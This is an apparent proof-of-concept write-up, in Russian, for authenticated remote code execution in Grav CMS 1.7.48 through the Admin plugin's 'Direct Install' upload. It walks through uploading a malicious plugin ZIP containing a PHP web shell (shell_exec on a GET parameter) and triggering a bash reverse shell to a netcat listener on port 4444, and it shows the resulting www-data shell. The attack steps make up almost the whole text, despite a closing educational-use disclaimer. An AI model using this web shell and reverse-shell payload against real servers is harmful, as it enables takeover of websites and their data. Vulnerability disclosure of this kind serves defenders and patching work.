
Grav CMS v1.7.48 с Admin Plugin v1.10.48 уязвим к удалённому выполнению кода (RCE) через функцию загрузки плагинов "Direct Install", что позволяет аутентифицированным администраторам выполнять произвольный PHP-код на сервере.
/admin/tools/direct-install (Панель администратора > Инструменты > Direct Install)Подготовьте слушатель:
nc -lvnp 4444
Войдите в панель администратора Grav как администратор.
Перейдите в Tools > Direct Install
Загрузите вредоносный ZIP-архив плагина (evilplugin.zip) со следующей структурой:
evilplugin/
├── evilplugin.php ← contains: shell_exec($_GET['cmd'])
└── blueprints.yaml ← minimal blueprint to pass validation
Запустите reverse shell:
curl --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/host.docker.internal/4444 0>&1'" http://<target>/
Reverse shell получен:
$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on <target-ip>
www-data@target:/var/www/html$ whoami
www-data
/admin/tools/direct-installТолько для образовательных и защитных целей.